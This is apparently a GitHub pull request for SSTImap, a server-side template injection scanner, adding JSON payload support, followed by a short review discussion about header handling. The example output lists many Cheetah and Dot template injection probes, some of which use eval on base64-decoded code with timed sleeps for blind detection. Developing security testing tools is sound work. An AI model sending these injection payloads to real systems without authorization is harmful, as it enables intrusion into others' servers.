### PR TITLE
Added support for requests with Json payloads

### PR DESCRIPTION
**Pull request by ahanel13**
# Changes
1. A command line argument for specifying `Content-Type` was added to the request argument group in `utils/cliparser.py`. 
2. Two if statements were added to determine which parsing logic should be used inside of `core/channel.py`

The Python library 'requests' handles any weird encoding within a JSON object. This might help close issue #22. Feel free to change or request any changes!

# Example
## Input
```bash
sstimap.py --url "https://8r0rfi31gis0tpckpe7acdbqghm9azyo.oastify.com/exampleEndpoint?token=jwt" --data "{\"var1\":\"*\", \"var2\":\"test\"}" -m POST --proxy http://127.0.0.1:8080 --content-type json 
```

## Output
A print statement was added before a request was sent see payloads. That print statement has been removed in this pull request. 
```
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; engines: 16; legacy_engines: 1

[*] Scanning url: https://8r0rfi31gis0tpckpe7acdbqghm9azyo.oastify.com/exampleEndpoint?token=jwt
[*] Testing if POST parameter 'var1' is injectable
[*] Cheetah plugin is testing rendering with tag '*'
{'var1': "${7200478542}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${1474717916}", 'var2': 'test'}
[*] Cheetah plugin is testing }* code context escape with 6 variations
{'var1': "1}${8593729677}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${2607196493}", 'var2': 'test'}
{'var1': "1)}${2766552029}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${7574378043}", 'var2': 'test'}
{'var1': '1"}${6616950201}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${\'fV\'.join(\'p4\')}${9753731037}', 'var2': 'test'}
{'var1': "1'}${9545346590}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${4868628590}", 'var2': 'test'}
{'var1': "1')}${3148157605}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${2696742588}", 'var2': 'test'}
{'var1': '1")}${8183413129}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${\'fV\'.join(\'p4\')}${4007057973}', 'var2': 'test'}
[*] Cheetah plugin is testing ]* code context escape with 6 variations
{'var1': "1]${9682964101}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${9679039122}", 'var2': 'test'}
{'var1': "1)]${7357211984}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${5571325363}", 'var2': 'test'}
{'var1': '1"]${2525361543}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${\'fV\'.join(\'p4\')}${6666445453}', 'var2': 'test'}
{'var1': "1']${6318943440}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${7538501386}", 'var2': 'test'}
{'var1': "1')]${2009868288}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${9164349001}", 'var2': 'test'}
{'var1': '1")]${4012483536}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${\'fV\'.join(\'p4\')}${5465635431}', 'var2': 'test'}
[*] Cheetah plugin is testing )* code context escape with 6 variations
{'var1': "1)${8867783885}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${5904911441}", 'var2': 'test'}
{'var1': "1))${7542366419}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${3093581619}", 'var2': 'test'}
{'var1': '1")${1531169914}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${\'fV\'.join(\'p4\')}${6958647451}', 'var2': 'test'}
{'var1': "1')${8126377459}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${1741615933}", 'var2': 'test'}
{'var1': "1'))${9404115834}${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}${8168949997}", 'var2': 'test'}
{'var1': '1"))${8488022290}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${\'fV\'.join(\'p4\')}${7246486918}', 'var2': 'test'}
{'var1': "${getVar('a', '').replace($getVar('a', ''), '')}${'fV'.join('p4')}", 'var2': 'test'}
[*] Cheetah plugin is testing blind injection
{'var1': "${3711052897}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${1197512342}", 'var2': 'test'}
[*] Cheetah plugin is testing }* code context escape with 6 variations
{'var1': "1}${7696207103}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${9428090366}", 'var2': 'test'}
{'var1': "1)}${8104387813}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${5554128183}", 'var2': 'test'}
{'var1': '1"}${1253538106}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${eval(__import__(\'base64\').urlsafe_b64decode(\'J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=\').decode()) and __import__(\'time\').sleep(4)}${8830561013}', 'var2': 'test'}
{'var1': "1'}${6725787645}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${8858799955}", 'var2': 'test'}
{'var1': "1')}${7508464861}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${7765251646}", 'var2': 'test'}
{'var1': '1")}${9287068990}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${eval(__import__(\'base64\').urlsafe_b64decode(\'J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=\').decode()) and __import__(\'time\').sleep(4)}${5647093301}', 'var2': 'test'}
[*] Cheetah plugin is testing ]* code context escape with 6 variations
{'var1': "1]${7440655077}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${3989055744}", 'var2': 'test'}
{'var1': "1)]${3606561952}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${1500964036}", 'var2': 'test'}
{'var1': '1"]${2120350966}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${eval(__import__(\'base64\').urlsafe_b64decode(\'J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=\').decode()) and __import__(\'time\').sleep(4)}${5077102956}', 'var2': 'test'}
{'var1': "1']${5715088785}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${1003197952}", 'var2': 'test'}
{'var1': "1')]${1508912449}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${4803819600}", 'var2': 'test'}
{'var1': '1")]${2236955918}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${eval(__import__(\'base64\').urlsafe_b64decode(\'J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=\').decode()) and __import__(\'time\').sleep(4)}${2794537812}', 'var2': 'test'}
[*] Cheetah plugin is testing )* code context escape with 6 variations
{'var1': "1)${7255205357}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${7765400280}", 'var2': 'test'}
{'var1': "1))${3654754567}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${7664324249}", 'var2': 'test'}
{'var1': '1")${6283315918}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${eval(__import__(\'base64\').urlsafe_b64decode(\'J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=\').decode()) and __import__(\'time\').sleep(4)}${3723004337}', 'var2': 'test'}
{'var1': "1')${5153597707}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${6398824765}", 'var2': 'test'}
{'var1': "1'))${2611967655}${getVar('a', '').replace($getVar('a', ''), '')}${eval(__import__('base64').urlsafe_b64decode('J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=').decode()) and __import__('time').sleep(4)}${5220046497}", 'var2': 'test'}
{'var1': '1"))${5728982977}${getVar(\'a\', \'\').replace($getVar(\'a\', \'\'), \'\')}${eval(__import__(\'base64\').urlsafe_b64decode(\'J2EnLmpvaW4oJ2FiJykgPT0gJ2FhYic=\').decode()) and __import__(\'time\').sleep(4)}${4426675250}', 'var2': 'test'}
[*] Dot plugin is testing rendering with tag '{{=*}}'
{'var1': '{{=2897237985}}{{=typeof(25)+30}}{{=2859508284}}', 'var2': 'test'}
[*] Dot plugin is testing ;}}*{{1; code context escape with 6 variations
{'var1': '1;}}{{=3958323116}}{{=typeof(25)+30}}{{=3692805304}}{{1;', 'var2': 'test'}
{'var1': '1);}}{{=7560435075}}{{=typeof(25)+30}}{{=8094548831}}{{1;', 'var2': 'test'}
...SNIP...
```

### CODE REVIEW

**Comment by vladko312** [comment]
This is a great addition and I would merge it into the next version. I would also like to move payload processing into a class to make it a bit cleaner, as well as giving dedicated header value a priority (or maybe leave headers entirely separate from payload processing). What do you think about this changes?

**Comment by ahanel13** [comment]
>I would also like to move payload processing into a class to make it a bit cleaner

I like this idea! I think making the code a little more modular would help with making changes in the future.

> as well as giving dedicated header value a priority (or maybe leave headers entirely separate from payload processing). What do you think about this changes?

I might not understand the issue with how headers are currently passed in and used. Are there limitations with the way user-provided headers are added to requests sent?

**Comment by vladko312** [comment]
> I might not understand the issue with how headers are currently passed in and used.

In your current code, `Content-Type` from your flag overwrites any user input, making it impossible to send data without it or with a different value

**Comment by ahanel13** [comment]
```python
if self.args.get('content_type') == "json":
            self.header_params["Content-Type"] = "application/json"
```

I think this should only update the Content-Type header if the `--content-type json` parameter is provided in the command line. 
 However, it would only overwrite the Content-Type header if it was provided via the "header" command line argument. 

_It's also possible to allow the requests library to set the Content-Type header based on what it's given._

**Pull request merged**
